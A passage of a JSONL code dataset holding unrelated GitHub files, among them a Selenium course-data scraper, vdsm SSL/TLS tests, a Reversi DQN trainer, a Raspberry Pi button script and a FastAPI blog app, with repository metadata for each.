{self.config['TOKEN']}\" )\n logging.info(f\"MACHINE_ID = {self.config['MACHINE_ID']}\" )\n logging.info(f\"PLOTTING_LOGS_PATH = {self.config['PLOTTING_LOGS_PATH']}\" )\n logging.info(\"********************************************\" )\n self.is_debug.setEnabled(False)\n if self.is_debug.isChecked():\n logger_gui.setLevel(logging.DEBUG)\n logging.info(\"DEBUG is ON\" )\n else:\n logger_gui.setLevel(logging.INFO)\n logging.info(\"DEBUG is OFF\" )\n \n self.chia_logger.set_value()\n self.run() \n self.timer.start(60000)\n self.startBtn.setEnabled(False)\n self.endBtn.setEnabled(True)\n except Exception as e:\n logging.error(e)\n \n def end(self):\n logging.info(\"***********Stopped*********\" )\n self.timer.stop()\n self.startBtn.setEnabled(True)\n self.endBtn.setEnabled(False) \n self.is_debug.setEnabled(True)\n\n \n\n\n \nif __name__ == '__main__':\n app = QtWidgets.QApplication(sys.argv)\n widget = MyDialog()\n widget.show()\n #widget.line_edit.setText('Text updated!')\n ret = sys.exit(app.exec_())\n sys.exit(ret)\n","repo_name":"achia-co/achia-dash","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":6519,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"16"} +{"seq_id":"9691561781","text":"from selenium import webdriver\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport time\n\nchrome = webdriver.Chrome()\nchrome.implicitly_wait(10)\nchrome.get(\"http://study.foton.com.cn\")\nchrome.maximize_window()\ncategory_list = ['领导力学院', '工程学院', '制造学院', '营销学院', '金融学院', '其他专业课程', '国际学院', '通用类', '精品微课',\n '计划类(面授)课程', '主题学习', '生产管��学院', '事业部专有课程', '研发管理学院', '市场运营学院', '财务管理学院',\n '销售管理学院', '人力资源学院', '职业化学院', '领导力学院', '综合管理学院', '个人发展学院']\n\n\ndef login():\n account = input('请输入用户名:')\n password = input('请输入密码:')\n\n ele = 
chrome.find_element_by_id(\"loginName\")\n ele.click()\n ele.send_keys(account)\n\n ele = chrome.find_element_by_id(\"password\")\n ele.click()\n ele.send_keys(password)\n\n time.sleep(1)\n ele = chrome.find_element_by_css_selector(\"#fm1 > input.btn.btn-block.btn-primary.btn-lg\")\n ele.click()\n\n\ndef find_courses_data():\n with open('course_data.txt', 'w', encoding='utf-8') as f:\n f.write('课程名称,')\n f.write('课程ID,')\n f.write('课程学分,')\n f.write('结业条件\\n')\n chrome.switch_to.frame(chrome.find_element_by_xpath('/html/body/div[2]/div[4]/div[2]/iframe'))\n time.sleep(3)\n # above = chrome.find_element_by_partial_link_text(\"学习中心\")\n study_center = WebDriverWait(chrome, 15, 0.5).until(\n EC.presence_of_element_located((By.PARTIAL_LINK_TEXT, '学习中心')))\n time.sleep(1)\n ActionChains(chrome).move_to_element(study_center).perform()\n time.sleep(2)\n # above = chrome.find_element_by_link_text(\"课程中心\")\n course_center = WebDriverWait(chrome, 15, 0.5).until(\n EC.presence_of_element_located((By.PARTIAL_LINK_TEXT, '课程中心')))\n course_center.click()\n chrome.switch_to.default_content()\n time.sleep(2)\n chrome.switch_to.frame(chrome.find_element_by_id('tbc_window_iframe_19'))\n time.sleep(2)\n for category in category_list:\n # ele = chrome.find_element_by_partial_link_text(category)\n ele = WebDriverWait(chrome, 15, 0.5).until(\n EC.presence_of_element_located((By.PARTIAL_LINK_TEXT, category)))\n ele.click()\n time.sleep(2)\n try:\n last_page = int(chrome.find_element_by_class_name('pagnum-last').text)\n except:\n last_page = 1\n for i in range(1, last_page+1):\n cp = 1\n # ele = chrome.find_element_by_id('categoryFilterResult')\n time.sleep(1)\n ele = WebDriverWait(chrome, 15, 0.5).until(\n EC.presence_of_element_located((By.ID, 'categoryFilterResult'))\n )\n # ul = ele.find_element_by_tag_name('ul')\n ul = WebDriverWait(ele, 15, 0.5).until(\n EC.presence_of_element_located((By.TAG_NAME, 'ul'))\n )\n # li_list = ul.find_elements_by_tag_name('li')\n li_list = WebDriverWait(ul, 15, 0.5).until(\n EC.presence_of_all_elements_located((By.TAG_NAME, 'li'))\n )\n for li in li_list:\n time.sleep(0.2)\n # div = li.find_element_by_class_name('list-p')\n div = WebDriverWait(li, 15, 0.5).until(\n EC.presence_of_element_located((By.CLASS_NAME, 'list-p')))\n # h3 = div.find_element_by_tag_name('h3')\n h3 = WebDriverWait(div, 15, 0.5).until(\n EC.presence_of_element_located((By.TAG_NAME, 'h3')))\n course_name = h3.text\n f.write(course_name + ',')\n course_id = h3.get_attribute('data-id')\n f.write(course_id + ',')\n detial_list = div.find_elements_by_class_name('learndetail')\n detial_credit = detial_list[0]\n # 这里的credit是str类型\n credit = detial_credit.find_elements_by_tag_name('span')[1].find_element_by_tag_name('em').text\n f.write(credit)\n f.write(',')\n completion = div.find_element_by_class_name('coursebrief').find_element_by_tag_name('em').text\n f.write(completion + '\\n')\n if last_page > 1:\n if cp < last_page:\n # next_page = chrome.find_element_by_class_name('pag-next-page')\n next_page = WebDriverWait(chrome, 30, 0.5).until(\n EC.presence_of_element_located((By.PARTIAL_LINK_TEXT, '下一页')))\n next_page.click()\n cp += 1\n time.sleep(3)\n\n\nif __name__ == \"__main__\":\n login()\n find_courses_data()\n 
chrome.quit()\n\n\n\n\n","repo_name":"Idealisten/OneClickToLearnFotonUniversityOnlineStudyPlatform","sub_path":"GetAllCourseData.py","file_name":"GetAllCourseData.py","file_ext":"py","file_size_in_byte":5331,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"26601972307","text":"# currently set to nsims = 250 and dirlimit = 25; reset to 2500 and 250 for production runs\n\nimport os\nfrom math import ceil\nfrom string import ascii_lowercase as letters\n\nimport numpy as np\nimport pandas as pd\nimport InterruptionAnalysis as ia\nimport Independent as sim\n\nnp.random.seed(12345)\n\n# import reference data and convert time step to 1/10th second\ndata = pd.read_csv('./data/timeseries.csv', index_col = 0)\nnumeric_cols = ['begin', 'end', 'dur', 'lat']\nfor col in numeric_cols:\n data[col] = data[col]/100\n\n# keep only those agents analyzed in the DHVg analysis: those with |x| >= 20\nsample = list(data.groupby(\"pID\")[\"dur\"].count().loc[lambda x: x >= 20].index)\n\n# estimate /p/ and /q/ for each r_i and collect it into a data frame indexed by pID with columns \"p\" and \"q\"\nrows = {}\nfor pID in sample:\n P_i = ia.get_transition_matrix(data, pID)\n p = P_i[0, 1]\n q = P_i[1, 0]\n rows[pID] = [p, q]\nP = pd.DataFrame.from_dict(rows, orient = \"index\", columns = [\"p\", \"q\"])\n\n# sim parameters for all sims\nnsims = 250\n\n####\n## Timer Code\n## prints to stdout the time it takes to simulate one reference individual nsims times\n## does not save any data\n# import time\n# time1 = time.time()\n# pID = np.random.choice(sample)\n# row = P[P.index.isin([pID])]\n# P_i = np.array([[1 - row[\"p\"], row[\"p\"]], [row[\"q\"], 1 - row[\"q\"]]])\n# gID = pID[:3]\n# T = round(data[data[\"gID\"] == gID][\"end\"].max())\n# # these two are the same for all in this file, but would change otherwise\n# N = 1\n# ns = list(range(N))\n# for run in range(nsims):\n# Y = sim.simulation(P_i, T, N, ns, oneagent = True)\n# X = ia.Y_to_X(Y, ns)\n# time2 = time.time()\n# print(time2 - time1)\n## end timer code\n####\n\n# prepare subdirectory structure\n# separate sims into subdirectories to speed file lookup\nsavepath = \"./data/simulations/mimic-agents\"\nif not os.path.isdir(savepath):\n os.mkdir(savepath)\ndirlimit = 25\nnsubdirs = ceil(nsims/dirlimit)\n\n# main loop\nfor pID in sample:\n print(pID)\n # select reference individual and associated transition matrix\n row = P[P.index.isin([pID])]\n P_i = np.array([[1 - row[\"p\"], row[\"p\"]], [row[\"q\"], 1 - row[\"q\"]]])\n \n # set sim parameters for this sim\n gID = pID[:3]\n T = round(data[data[\"gID\"] == gID][\"end\"].max())\n # these two are the same for all in this file, but would change otherwise\n N = 1\n ns = list(range(N))\n\n # prepare subdirectories for this pID\n pidpath = savepath + f\"/{pID}\"\n if not os.path.isdir(pidpath):\n os.mkdir(pidpath)\n for i in range(nsubdirs):\n subpath = f\"{pidpath}/{letters[i]}\"\n if not os.path.isdir(subpath):\n os.mkdir(subpath)\n\n # run the sims\n pointer = 0\n subdir = letters[pointer]\n for run in range(nsims):\n if run > 0 and run % dirlimit == 0:\n pointer += 1\n subdir = letters[pointer]\n Y = sim.simulation(P_i, T, N, ns, oneagent = True)\n X = ia.Y_to_X(Y, ns)\n # and store them in the appropriate place\n 
X.to_csv(f\"{pidpath}/{subdir}/{pID}-{run}.csv\")\n\n","repo_name":"ngmaclaren/interruption-abm","sub_path":"generate-mimic-agents.py","file_name":"generate-mimic-agents.py","file_ext":"py","file_size_in_byte":3053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"1431386758","text":"\"\"\"Urls for feedgrabber categories\"\"\"\nfrom django.conf.urls.defaults import *\n\nfrom feedgrabber.models import Category\n\ncategory_conf = {'queryset': Category.objects.all()}\n\nurlpatterns = patterns('django.views.generic.list_detail',\n url(r'^$', 'object_list',\n category_conf, 'feedgrabber_category_list'),\n )\n\nurlpatterns += patterns('feedgrabber.views.categories',\n url(r'^(?P<slug>[-\\w]+)/$', 'view_category_detail',\n name='feedgrabber_category_detail'),\n )\n","repo_name":"Fantomas42/django-feedgrabber","sub_path":"feedgrabber/urls/categories.py","file_name":"categories.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"16"} +{"seq_id":"2844467872","text":"import RPi.GPIO as GPIO\nfrom time import sleep\nfrom socketIO_client import SocketIO, BaseNamespace\nfrom config import CLIENT_HOST, PORT, RPiConfig\n\nsio = SocketIO(CLIENT_HOST, PORT)\nispace = sio.define(BaseNamespace, '/input')\n\nGPIO.setmode(GPIO.BOARD)\nGPIO.setwarnings(False)\n\ntry:\n GPIO.setup([RPiConfig.LEFT_BUTTON_PIN, RPiConfig.RIGHT_BUTTON_PIN], GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\n GPIO.setup([RPiConfig.LEFT_DIOD_PIN, RPiConfig.RIGHT_DIOD_PIN], GPIO.OUT, initial = GPIO.LOW)\n while True:\n if GPIO.input(RPiConfig.LEFT_BUTTON_PIN):\n GPIO.output(RPiConfig.LEFT_DIOD_PIN, GPIO.HIGH)\n ispace.emit('button pressed', {'data': '1'})\n sleep(RPiConfig.DIOD_TIMEOUT)\n GPIO.output(RPiConfig.LEFT_DIOD_PIN, GPIO.LOW)\n if GPIO.input(RPiConfig.RIGHT_BUTTON_PIN):\n GPIO.output(RPiConfig.RIGHT_DIOD_PIN, GPIO.HIGH)\n ispace.emit('button pressed', {'data': '2'})\n sleep(RPiConfig.DIOD_TIMEOUT)\n GPIO.output(RPiConfig.RIGHT_DIOD_PIN, GPIO.LOW)\n sleep(0.05)\nfinally:\n GPIO.cleanup()\n","repo_name":"ivellios/familiaria","sub_path":"buttons.py","file_name":"buttons.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"27894501167","text":"#!/usr/bin/python3\n\nimport hidden_4\n\n\ndef main():\n \"\"\"Get the names that are in the file using the dir() function.\n Go through each name to make sure that only the ones\n that do not start with '__' are stored in the names list.\n Print each name from the sorted list of names.\n Sorting will be handled with the sorted() method\n \"\"\"\n\n names = [name for name in dir(hidden_4) if not name.startswith('__')]\n\n for name in sorted(names):\n print(name)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ShawnZain/alx-higher_level_programming","sub_path":"0x02-python-import_modules/4-hidden_discovery.py","file_name":"4-hidden_discovery.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"74061969929","text":"import apprise\n\nimport logging\n\nlog = logging.getLogger('apprise')\n\n\nclass Apprise:\n NAME = \"Apprise\"\n\n def __init__(self, url, title='Cloudplow'):\n self.url = url\n self.title = title\n log.debug(\"Initialized Apprise notification agent\")\n\n def send(self, **kwargs):\n if not self.url:\n log.error(\"You must specify a URL 
when initializing this class\")\n return False\n\n # send notification\n try:\n apobj = apprise.Apprise()\n apobj.add(self.url)\n apobj.notify(\n title=self.title,\n body=kwargs['message'],\n )\n\n except Exception:\n log.exception(f\"Error sending notification to {self.url}\")\n return False\n","repo_name":"l3uddz/cloudplow","sub_path":"utils/notifications/apprise.py","file_name":"apprise.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","stars":329,"dataset":"github-code","pt":"16"} +{"seq_id":"75045815","text":"import random\r\nimport matplotlib.pyplot as plt\r\nfrom tqdm import tqdm\r\nimport time\r\n\r\nclass Reservoir:\r\n def __init__(self,k): #k개 샘플링하겠다.\r\n self.sampled = []\r\n self.k = k\r\n self.cnt =0 # 몇 번째로 들어온 아이템인지 나타내는 변수\r\n\r\n def put(self, item): #스트림에서 item 하나가 reservoir sampled로 들어옴\r\n if self.cnt < self.k: # k개 이하로 들어올 경우 : 배열에 그냥 추가\r\n self.sampled.append(item)\r\n else: # k개 이상이 들어왔을 경우 : r<k일 때만 r번째 값을 item으로 대체\r\n r = random.randint(0,self.cnt)\r\n if r<self.k:\r\n self.sampled[r] = item\r\n self.cnt += 1\r\n\r\nclass ReservoirWithReplacement: #복원추출을 위한 클래스\r\n def __init__(self,k2):\r\n self.k2 = k2\r\n\r\n def create(self,stream):\r\n for i in range(self.k2):\r\n self.reservoir = Reservoir(1) #크기 1짜리 Reservoir k번 돌리기\r\n for j in range(stream):\r\n self.reservoir.put(j)\r\n print(j,' : ',self.reservoir.sampled)\r\n arr.append(self.reservoir.sampled)\r\n\r\narr=[]\r\nfor i in tqdm(range(10000)):\r\n reservoir_replacement = ReservoirWithReplacement(100) #100개의 값을 추출\r\n reservoir_replacement.create(1000) #0 부터 999 까지의 숫자 입력\r\n\r\n# 추출횟수 구하기\r\ncnt=[0 for i in range(1000)]\r\nfor i in range(len(arr)):\r\n for j in range(len(arr[i])):\r\n cnt[arr[i][j]]+=1\r\nprint(\"cnt : \", cnt)\r\n\r\n# 시각화\r\nplt.plot([i for i in range(1000)], cnt)\r\nplt.show()","repo_name":"skm0626/Algorithm","sub_path":"bigdata_2022/hw1-2_ReservoirWithReplacement.py","file_name":"hw1-2_ReservoirWithReplacement.py","file_ext":"py","file_size_in_byte":1626,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"15828955305","text":"def find_element(nums, target):\n length = len(nums)\n st = 0\n ed = length-1\n while st < ed:\n mid = (st + ed + 1) // 2\n if nums[mid][1] > target:\n ed = mid - 1\n else:\n st = mid\n return nums[st]\n\ndef UptimalUtilization(a, b, target):\n a.sort(key=lambda x:x[1])\n b.sort(key=lambda x:x[1])\n len1 = len(a)\n len2 = len(b)\n curval = 0\n res = []\n for idx1, num1 in a:\n idx2, num2 = find_element(b,target-num1)\n if num1 + num2 <= target:\n print(num1+num2)\n if curval < num1 + num2:\n curval = num1 + num2\n res = [[idx1, idx2]]\n elif curval == num1 + num2:\n res.append([idx1, idx2])\n return res\n\n\na = [[1, 2], [2, 4], [3, 6]]\nb = [[1, 2]]\ntarget = 7\n#print(UptimalUtilization(a, b, target))\n\n\nprint (UptimalUtilization([(1,2000),(2,3000),(3,6000)],\n\t [(1,2000)], 7000))\n","repo_name":"SrilakshmiSripathi/Data_Structures_and_Algorithms_Practice","sub_path":"DataStructures/Assorted/airtime3.py","file_name":"airtime3.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70574112007","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport socket\n\nimport pytest\n\nfrom vdsm.common import cmdutils\nfrom vdsm.common import concurrent\nfrom vdsm.common import commands\nfrom 
vdsm.protocoldetector import MultiProtocolAcceptor\nfrom vdsm.sslutils import SSLContext, SSLHandshakeDispatcher\nfrom yajsonrpc.betterAsyncore import Reactor\n\nfrom integration.sslhelper import key_cert_pair # noqa: F401\n\n\n@pytest.fixture\ndef fake_gethostbyaddr(monkeypatch, request):\n entry = getattr(request, 'param', None)\n if entry is not None:\n hostname, ipaddrlist = entry\n\n def impl(addr):\n if addr not in ipaddrlist:\n raise socket.herror()\n return (hostname, [], ipaddrlist)\n\n monkeypatch.setattr('vdsm.sslutils.socket.gethostbyaddr', impl)\n\n\n@pytest.mark.parametrize('fake_gethostbyaddr', [('example.com', ['10.0.0.1'])],\n indirect=True)\ndef test_same_string(fake_gethostbyaddr):\n assert SSLHandshakeDispatcher.compare_names('10.0.0.1', 'example.com')\n\n\n@pytest.mark.parametrize('lhs,rhs', [('::ffff:127.0.0.1', '127.0.0.1'),\n ('127.0.0.1', '::ffff:127.0.0.1')])\ndef test_mapped_address(lhs, rhs):\n assert SSLHandshakeDispatcher.compare_names(lhs, rhs)\n\n\n@pytest.mark.parametrize('fake_gethostbyaddr', [('example.com', ['10.0.0.1'])],\n indirect=True)\ndef test_failed_mapped_address(fake_gethostbyaddr):\n assert not SSLHandshakeDispatcher.compare_names('10.0.0.1',\n '::ffff:127.0.0.1')\n\n\n@pytest.mark.parametrize('fake_gethostbyaddr',\n [('example.com', ['10.0.0.1', '10.0.0.2'])],\n indirect=True)\ndef test_multiple(fake_gethostbyaddr):\n assert SSLHandshakeDispatcher.compare_names('10.0.0.2', 'example.com')\n\n\n@pytest.mark.parametrize('fake_gethostbyaddr',\n [('evil.imposter.com', ['10.0.0.1'])],\n indirect=True)\ndef test_imposter(fake_gethostbyaddr):\n assert not SSLHandshakeDispatcher.compare_names('10.0.0.1', 'example.com')\n\n\n@pytest.mark.parametrize('lhs,rhs', [('127.0.0.1', 'example.com'),\n ('::1', 'example.com'),\n ('::ffff:127.0.0.1', 'example.com')])\ndef test_local_addresses(lhs, rhs):\n assert SSLHandshakeDispatcher.compare_names(lhs, rhs)\n\n\n@pytest.fixture\ndef dummy_register_protocol_detector(monkeypatch):\n monkeypatch.setattr(MultiProtocolAcceptor, '_register_protocol_detector',\n lambda d: d.close())\n\n\n@pytest.fixture # noqa: F811 # TODO: remove after upgrading flake to 3.9.2\ndef listener(dummy_register_protocol_detector, key_cert_pair, request): # noqa: F811, E501\n key_file, cert_file = key_cert_pair\n reactor = Reactor()\n\n sslctx = SSLContext(cert_file=cert_file, key_file=key_file,\n ca_certs=cert_file)\n\n acceptor = MultiProtocolAcceptor(\n reactor,\n '127.0.0.1',\n 0,\n sslctx=sslctx\n )\n\n try:\n t = concurrent.thread(reactor.process_requests)\n t.start()\n (host, port) = acceptor._acceptor.socket.getsockname()[0:2]\n yield (host, port)\n finally:\n acceptor.stop()\n reactor.stop()\n t.join()\n\n\n@pytest.fixture # noqa: F811 # TODO: remove after upgrading flake to 3.9.2\ndef client_cmd(listener, key_cert_pair): # noqa: F811\n key_file, cert_file = key_cert_pair\n\n def wrapper(protocol):\n (host, port) = listener\n cmd = ['openssl', 's_client', '-connect', '%s:%s' % (host, port),\n '-CAfile', cert_file, '-cert', cert_file, '-key', key_file,\n protocol]\n return commands.run(cmd)\n\n return wrapper\n\n\n@pytest.mark.parametrize('protocol', [\n pytest.param(\n '-ssl2',\n id='ssl2'\n ),\n pytest.param(\n '-ssl3',\n id='ssl3'\n ),\n pytest.param(\n '-tls1',\n id='tls1'\n ),\n pytest.param(\n '-tls1_1',\n id='tls1.1'\n )\n])\ndef test_tls_unsupported_protocols(client_cmd, protocol):\n with pytest.raises(cmdutils.Error):\n client_cmd(protocol)\n\n\n@pytest.mark.parametrize('protocol', [\n pytest.param(\n '-tls1_2',\n 
id='tls1.2'\n ),\n])\ndef test_tls_protocols(client_cmd, protocol):\n assert b\"Verify return code: 0 (ok)\" in client_cmd(protocol)\n","repo_name":"oVirt/vdsm","sub_path":"tests/ssl_test.py","file_name":"ssl_test.py","file_ext":"py","file_size_in_byte":4490,"program_lang":"python","lang":"en","doc_type":"code","stars":147,"dataset":"github-code","pt":"16"} +{"seq_id":"19806580385","text":"from __future__ import absolute_import\n\n\nimport oneflow.core.operator.op_conf_pb2 as op_conf_util\nimport oneflow.core.register.logical_blob_id_pb2 as logical_blob_id_util\nimport oneflow.python.framework.interpret_util as interpret_util\nimport oneflow.python.framework.distribute as distribute_util\nimport oneflow.python.framework.id_util as id_util\nimport oneflow.python.framework.input_blob_def as input_blob_util\nimport oneflow.python.framework.remote_blob as remote_blob_util\nfrom oneflow.python.oneflow_export import oneflow_export\nfrom typing import Optional, Tuple\n\n\n@oneflow_export(\"experimental.indexed_slices_reduce_sum\")\ndef indexed_slices_reduce_sum(\n indices: input_blob_util.ArgBlobDef,\n values: input_blob_util.ArgBlobDef,\n name: Optional[str] = None,\n) -> Tuple[remote_blob_util.BlobDef]:\n op_conf = op_conf_util.OperatorConf()\n if name is None:\n op_conf.name = id_util.UniqueStr(\"IndexedSlicesReduceSum_\")\n else:\n op_conf.name = name\n\n op_conf.indexed_slices_reduce_sum_conf.x_indices = indices.unique_name\n op_conf.indexed_slices_reduce_sum_conf.x_values = values.unique_name\n op_conf.indexed_slices_reduce_sum_conf.y_indices = \"y_indices\"\n op_conf.indexed_slices_reduce_sum_conf.y_values = \"y_values\"\n op_conf.indexed_slices_reduce_sum_conf.num_unique = \"num_unique\"\n\n interpret_util.Forward(op_conf)\n y_indices_lbi = logical_blob_id_util.LogicalBlobId()\n y_indices_lbi.op_name = op_conf.name\n y_indices_lbi.blob_name = \"y_indices\"\n y_values_lbi = logical_blob_id_util.LogicalBlobId()\n y_values_lbi.op_name = op_conf.name\n y_values_lbi.blob_name = \"y_values\"\n num_unique_lbi = logical_blob_id_util.LogicalBlobId()\n num_unique_lbi.op_name = op_conf.name\n num_unique_lbi.blob_name = \"num_unique\"\n\n return (\n remote_blob_util.RemoteBlob(y_indices_lbi),\n remote_blob_util.RemoteBlob(y_values_lbi),\n remote_blob_util.RemoteBlob(num_unique_lbi),\n )\n","repo_name":"Sodu-Qinming/Oneflow","sub_path":"oneflow/python/experimental/indexed_slices_ops.py","file_name":"indexed_slices_ops.py","file_ext":"py","file_size_in_byte":1965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"23636562039","text":"class DiameterOfBinaryTree:\n \"\"\"\n Desc:\n # 543\n Given the root of a binary tree, return the length of the diameter of the tree.\n Link: \n https://leetcode.com/problems/diameter-of-binary-tree/\n Notes:\n \"\"\"\n\n # dfs\n # Time: O(n) - nodes in tree\n # Space: O(n)\n def diameterOfBinaryTree(self, root): \n # the diameter is the longest path b/n any two nodes\n # path is a cnt of edges\n \n res = 0\n \n # for each node get length of left and right path\n # res = max(left + right paths, res)\n \n def maxPath(n):\n if not n: return 0\n \n nonlocal res\n \n # get max paths\n left = maxPath(n.left) \n right = maxPath(n.right)\n path = 1 + max(left, right)\n \n # check diameter \n res = max(res, left + right)\n \n return path \n \n maxPath(root)\n return res\n\n\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = 
right","repo_name":"csdatasist/lc-repo","sub_path":"others/DiameterOfBinaryTree.py","file_name":"DiameterOfBinaryTree.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"27489946784","text":"import numpy as np\r\n\r\nimport argparse\r\nfrom reversi import Reversi\r\nfrom dqn_agent import DQNAgent\r\nfrom random_agent import RANDOMAgent\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument(\"-m\", \"--model_path\", help='Path ot the model files')\r\n parser.add_argument(\"-l\", \"--load\", dest=\"load\", action=\"store_true\",\r\n default=False, help='Load trained model (default: off)')\r\n parser.add_argument(\"-e\", \"--epoch-num\", dest=\"n_epochs\", default=30,\r\n type=int, help='Numpber of training epochs (default: 1000)')\r\n parser.add_argument(\"--simple\", dest=\"is_simple\", action=\"store_true\", default=True,\r\n help='Train simple model without cnn (8 x 8) (default: true)')\r\n parser.add_argument(\"-g\", \"--graves\", dest=\"graves\", action=\"store_true\",\r\n default=False, help='Use RmpropGraves (default: off)')\r\n parser.add_argument(\"-d\", \"--ddqn\", dest=\"ddqn\", action=\"store_true\",\r\n default=False, help='Use Double DQN (default: off)')\r\n parser.add_argument(\"-s\", \"--save-interval\", dest=\"save_interval\", default=15, type=int) # 1000\r\n args = parser.parse_args()\r\n\r\n # parameters\r\n n_epochs = args.n_epochs\r\n\r\n # environment, agent\r\n env = Reversi()\r\n\r\n # playerID\r\n playerID = [env.Black, env.White, env.Black]\r\n\r\n # player agent\r\n players = []\r\n # player[0] = env.Black\r\n agent = DQNAgent(env.enable_actions, env.name, color=\"black\", ddqn=args.ddqn)\r\n if args.load:\r\n agent.load_model(args.model_path)\r\n else:\r\n agent.init_model()\r\n players.append(agent)\r\n\r\n # player[1] = env.White\r\n agent = RANDOMAgent(env.enable_actions, env.name, color=\"white\")\r\n players.append(agent)\r\n\r\n # # variables\r\n wins = [0, 0]\r\n e = 0 # エポック数\r\n \r\n while e < n_epochs:\r\n # reset\r\n env.reset()\r\n\r\n state_ts = [None, None]\r\n action_ts = [None, None]\r\n state_t_1s = [None, None]\r\n reward_ts = [None, None]\r\n terminals = [None, None]\r\n \r\n while not env.isEnd():\r\n\r\n # 次の手番の人をゲットする\r\n # ゲームが終わっていない以上、BlackかWhiteしか出ない\r\n next_player_color = env.get_next_player()\r\n idx = 0 if next_player_color == env.Black else 1 if next_player_color == env.White else None # Noneだとプログラムおかしい\r\n\r\n # observe environment\r\n state_t_1s[idx], reward_ts[idx], terminals[idx] = env.observe(next_player_color)\r\n\r\n # 1時刻前の結果をstoreにpushしておく\r\n # 本来はenv.execute_action(action_ts[col], playerID[col])の後に、env.observe()とstore_experienceを実行したいが、\r\n # 相手番との兼ね合いがあるので、また自分の手番になった際に代入するようにしている\r\n if action_ts[idx] != None:\r\n players[idx].store_experience([state_ts[idx]], action_ts[idx], reward_ts[idx], [state_t_1s[idx]], terminals[idx])\r\n\r\n # 着手する盤面をstate_tに代入\r\n state_ts[idx] = state_t_1s[idx] \r\n # 行動を選択\r\n action_ts[idx] = players[idx].select_action([state_ts[idx]], players[idx].exploration)\r\n # 実際に環境に対してアクションを起こす\r\n env.execute_action(action_ts[idx], playerID[idx])\r\n\r\n # whileを抜けたということはゲームが終わったということ\r\n # 最後のstore_experienceを代入する\r\n for i, color in enumerate([env.Black, env.White]):\r\n state_t_1s[i], reward_ts[i], terminals[i] = env.observe(color)\r\n players[i].store_experience([state_ts[i]], action_ts[i], reward_ts[i], [state_t_1s[i]], terminals[i])\r\n\r\n 
if reward_ts[i] == 1:\r\n wins[i] += 1\r\n \r\n # 1試合終わったら学習を開始する ⇒ N試合終わったら学習を開始するに変更する\r\n\r\n # εの値を小さくする\r\n players[0].update_exploration(e)\r\n players[1].update_exploration(e)\r\n\r\n # 学習\r\n players[0].experience_replay(e)\r\n players[1].experience_replay(e)\r\n\r\n # 10試合でtarget_modelもupdateする\r\n if e % 10:\r\n players[0].update_target_model\r\n players[1].update_target_model\r\n players[0].reset_experience()\r\n players[1].reset_experience()\r\n\r\n print(f\"EPOCH: {e:03d}/{n_epochs - 1:03d} | BLACK_WIN: {wins[0]:03d} | WHITE_WIN: {wins[1]:03d}\")\r\n if e > 0 and e % args.save_interval == 0:\r\n players[0].save_model(e)\r\n players[0].save_model()\r\n players[1].save_model(e)\r\n players[1].save_model()\r\n e += 1\r\n\r\n # save model\r\n players[0].save_model()\r\n players[1].save_model()\r\n","repo_name":"youseegreen/reversi_keras_dqn","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"34754001259","text":"from fastapi import FastAPI, Depends, status, Response, HTTPException\r\nimport models, schemas\r\nfrom database import engine, SessionLocal\r\nfrom sqlalchemy.orm import Session\r\n\r\napp = FastAPI()\r\n\r\nmodels.Base.metadata.create_all(bind=engine)\r\n\r\ndef get_db():\r\n\tdb = SessionLocal()\r\n\ttry:\r\n\t\tyield db\r\n\tfinally:\r\n\t\tdb.close()\r\n\r\n# Create a Blog\r\n\r\n@app.post('/blogs', status_code=status.HTTP_201_CREATED) #status_code=201 also works\r\ndef create(blog:schemas.Blog, db:Session = Depends(get_db)):\r\n\tnew_blog = models.Blog(title=blog.title, body=blog.body)\r\n\tdb.add(new_blog)\r\n\tdb.commit()\r\n\tdb.refresh(new_blog)\r\n\treturn new_blog\r\n\r\n# Delete a Blog\r\n\r\n@app.delete('/blogs/{id}', status_code=status.HTTP_204_NO_CONTENT)\r\ndef destroy(id:int, db:Session=Depends(get_db)):\r\n\tblog = db.query(models.Blog).filter(models.Blog.id == id)\r\n\tif not blog.first():\r\n\t\traise HTTPException(status_code=status.HTTP_404_NOT_FOUND, \r\n\t\t\t\t\t\t\tdetail=f'Blog {id} not found.')\r\n\tblog.delete(synchronize_session=False)\r\n\tdb.commit()\r\n\treturn {'detail':f'Blog {id} has been deleted.'}\r\n\r\n# Update a Blog\r\n\r\n@app.put('/blog/{id}', status_code=status.HTTP_202_ACCEPTED)\r\ndef update(id:int, blog:schemas.Blog, db:Session = Depends(get_db)):\r\n\tblog_ = db.query(models.Blog).filter(models.Blog.id == id)\r\n\tif not blog_.first():\r\n\t\traise HTTPException(status_code=status.HTTP_404_NOT_FOUND, 